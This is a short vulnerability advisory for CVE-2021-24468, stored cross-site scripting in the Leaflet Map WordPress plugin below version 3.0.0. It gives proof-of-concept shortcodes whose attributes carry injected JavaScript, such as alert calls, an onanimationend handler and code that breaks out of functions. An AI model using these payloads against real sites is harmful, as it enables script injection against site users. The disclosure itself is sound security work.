Leaflet Map < 3.0.0 – Contributor+ Stored XSS | CVE 2021-24468

Description

The plugin does not escape some shortcode attributes before they are used in JavaScript code or HTML, which could allow users with a role as low as Contributors to exploit stored XSS issues

Proof of Concept

Most of the shortcode attributes are not escaped, so these are just one of them:

[leaflet-map lat="alert('lat')||37.4871" lng="alert('lng')||126.6794" tileurl="'+alert('tileurl');baseUrl='https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" detect_retina="alert('detect_retina')" min_zoom="alert('min_zoom')||1" max_zoom="alert('max_zoom')||200" zoomControl="alert('zoomcontrol')" scrollWheel="alert('scrollWheel')||true" doubleClickZoom="alert('doubleClickZoom')" zoom="alert('zoom')||10" height='100px;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(String.fromCharCode(104,101,105,103,104,116))" data-x="']

Or,

[leaflet-circle fitbounds="0;});alert('fitbounds');(!function(){void 1" lat="0;});alert('lat');(!function(){void 1" lng="0;});alert('lng');(!function(){void 1" shape='});alert("shape")//' message='a']

After review of the updated changes (https://github.com/bozdoz/wp-plugin-leaflet-map/pull/138/files): [leaflet-circle shape='});alert("shape")//' message='a']